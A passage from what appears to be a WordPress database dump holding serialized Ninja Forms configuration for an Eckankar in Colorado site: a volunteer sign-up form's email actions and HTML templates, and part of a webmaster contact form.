end.\";}s:2:\"id\";i:94;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:20\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:95;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:20\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:44:\"Eckankar in Colorado Volunteer Opportunities\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:4744:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Eckankar in Colorado Volunteer Opportunities</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website.</p><br /><br />\r\n<p>You are receiving this submission because you are listed as the contact for <em>Eckankar in Colorado Volunteer</em>s.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has volunteered for service. Here is the information that <span style=\"color: #666666\">{field:textbox_221} {field:lastname_222}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_221}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_222}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_223}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_224}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_225}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Book Discussions:</strong> {field:listmultiselect_228}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Community HU:</strong> {field:listmultiselect_232}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ECK Worship Service:</strong> {field:listmultiselect_233}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Email Newsletter Help:</strong> {field:listmultiselect_234}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Round Tables:</strong> {field:listmultiselect_235}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Satsangs:</strong> {field:listmultiselect_236}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Vahana:</strong> {field:listmultiselect_237}<br /><br /><br />\r\n</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE </strong><em>(Optional)</em><strong>: </strong>{field:textarea_229}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n<br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:96;}}s:8:\"settings\";a:30:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:17:\"Volunteer for ECK\";s:10:\"created_at\";s:19:\"2019-07-15 14:07:54\";s:10:\"form_title\";s:17:\"Volunteer for ECK\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-04-07 02:14:32\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"3\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:18:{i:0;s:8:\"html_220\";i:1;s:11:\"textbox_221\";i:2;s:12:\"lastname_222\";i:3;s:9:\"email_223\";i:4;s:9:\"phone_224\";i:5;s:14:\"listselect_225\";i:6;s:6:\"hr_226\";i:7;s:8:\"html_227\";i:8;s:19:\"listmultiselect_228\";i:9;s:19:\"listmultiselect_232\";i:10;s:19:\"listmultiselect_236\";i:11;s:19:\"listmultiselect_237\";i:12;s:19:\"listmultiselect_234\";i:13;s:19:\"listmultiselect_235\";i:14;s:19:\"listmultiselect_233\";i:15;s:12:\"textarea_229\";i:16;s:18:\"html_1663800740469\";i:17;s:10:\"submit_231\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(25,'a:7:{s:2:\"id\";i:25;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:401:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Webmaster Contact Form</span></span></span></strong></span></h3>\r\nIf you have feedback about our website or would like to report a website issue, just fill out the form below.\r\nPlease be as descriptive as possible and provide details so that we can track down and address the problem.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:401:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Webmaster Contact Form</span></span></span></strong></span></h3>\r\nIf you have feedback about our website or would like to report a website issue, just fill out the form below.\r\nPlease be as descriptive as possible and provide details so that we can track down and address the problem.\";s:3:\"key\";s:8:\"html_321\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_321\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:275;}i:1;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_322\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_322\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:276;}i:2;a:2:{s:8:\"settings\";a:49:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_323\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_323\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:277;}i:3;a:2:{s:8:\"settings\";a:49:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_324\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_324\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:278;}i:4;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_325\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_325\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:279;}i:5;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:15:\"Message Subject\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_326\";s:11:\"field_label\";s:15:\"Message Subject\";s:9:\"field_key\";s:11:\"textbox_326\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";b:0;s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:280;}i:6;a:2:{s:8:\"settings\";a:35:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_327\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_327\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";b:0;s:5:\"value\";s:0:\"\";}s:2:\"id\";i:281;}i:7;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:154:\"<b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b>\";s:3:\"key\";s:8:\"html_328\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_328\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:282;}i:8;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800773041\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"639\";}i:9;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_330\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_330\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:284;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:46:01\";s:5:\"label\";s:9:\"Save Form\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:97;}i:1;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2018-01-03 11:46:01\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_324}\";s:13:\"email_subject\";s:38:\"Western Slope Leadership Communication\";s:13:\"email_message\";s:4984:\"<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" 